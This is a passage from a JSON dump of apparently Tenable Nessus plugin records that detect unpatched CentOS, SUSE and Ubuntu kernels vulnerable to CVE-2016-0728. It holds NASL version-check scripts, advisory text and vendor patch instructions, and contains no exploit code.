= 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", 
reference:\"kernel-tools-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.4.5.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:23:27", "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to receive a\nsecurity fix.\n\nFollowing security bug was fixed :\n\n - A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers\n gain root privileges. (bsc#962075, CVE-2016-0728).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-25T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:0186-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-25T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-devel"], "id": "SUSE_SU-2016-0186-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88140", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:0186-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88140);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-0728\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:0186-1)\");\n 
script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP1 kernel was updated to receive a\nsecurity fix.\n\nFollowing security bug was fixed :\n\n - A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers\n gain root privileges. (bsc#962075, CVE-2016-0728).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=962075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0728/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20160186-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2b46e576\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP1-2016-124=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP1-2016-124=1\n\nSUSE Linux Enterprise Server 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP1-2016-124=1\n\nSUSE Linux Enterprise Module for Public Cloud 12 :\n\nzypper in -t patch SUSE-SLE-Module-Public-Cloud-12-2016-124=1\n\nSUSE Linux Enterprise Live Patching 12 :\n\nzypper in -t patch SUSE-SLE-Live-Patching-12-2016-124=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t 
patch SUSE-SLE-DESKTOP-12-SP1-2016-124=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", 
reference:\"kernel-default-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debugsource-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-devel-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-syms-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-syms-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.51-60.25.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 
\"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:29:21", "description": "Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-20T00:00:00", "title": "Ubuntu 14.04 LTS : linux-lts-wily vulnerability (USN-2872-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2872-2.NASL", "href": "https://www.tenable.com/plugins/nessus/88015", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2872-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88015);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2872-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-wily vulnerability (USN-2872-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2872-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.2-generic,\nlinux-image-4.2-generic-lpae and / or linux-image-4.2-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. 
/ NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2872-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-25-generic\", pkgver:\"4.2.0-25.30~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-25-generic-lpae\", pkgver:\"4.2.0-25.30~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-25-lowlatency\", pkgver:\"4.2.0-25.30~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-generic / linux-image-4.2-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:29:21", "description": "Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-20T00:00:00", "title": "Ubuntu 14.04 LTS : linux vulnerability (USN-2870-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2870-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88010", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2870-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88010);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2870-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerability (USN-2870-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2870-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic,\nlinux-image-3.13-generic-lpae and / or linux-image-3.13-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. 
/ NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2870-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-76-generic\", pkgver:\"3.13.0-76.120\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-76-generic-lpae\", pkgver:\"3.13.0-76.120\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-76-lowlatency\", pkgver:\"3.13.0-76.120\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 
